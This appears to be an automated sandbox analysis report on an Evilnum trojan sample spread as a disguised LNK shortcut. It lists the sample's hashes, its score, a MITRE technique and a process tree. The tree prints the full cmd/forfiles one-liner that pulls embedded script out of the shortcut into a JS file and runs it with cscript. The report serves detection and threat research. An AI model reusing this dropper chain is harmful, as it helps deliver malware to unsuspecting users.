evilnum | 1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284

Analysis

Target

1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284.lnk
Size

173KB
MD5

8c4675a080b642bbf9f096d0e60711ff
SHA1

36345044d5e88cc8c002863e3f1f48fdec8ff4d9
SHA256

1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284
SHA512

362243992ad92b2824c3e2f102d4337da32181868fe482c4d4d058c7a50a020df2fff1f5be8a7bbd50469a55b4b142831ff2f44f81136b406f07a4c81513f3b1

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2268 wrote to memory of 1052	2268	cmd.exe	70
PID 2268 wrote to memory of 1052	2268	cmd.exe	70
PID 1052 wrote to memory of 1120	1052	cmd.exe	71
PID 1052 wrote to memory of 1120	1052	cmd.exe	71
PID 1052 wrote to memory of 1324	1052	cmd.exe	72
PID 1052 wrote to memory of 1324	1052	cmd.exe	72
PID 1052 wrote to memory of 1492	1052	cmd.exe	73
PID 1052 wrote to memory of 1492	1052	cmd.exe	73
PID 1052 wrote to memory of 1440	1052	cmd.exe	74
PID 1052 wrote to memory of 1440	1052	cmd.exe	74
PID 1052 wrote to memory of 512	1052	cmd.exe	75
PID 1052 wrote to memory of 512	1052	cmd.exe	75

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\1bd7598549a967fe6df9c79a173e3f6c6721ec21088e5e1543e2865436cce284.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Credit Card Front.jpg.lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1052
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Cred*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1324
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:1492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1440
- - C:\Windows\system32\cscript.exe
    cSCripT "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:512

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact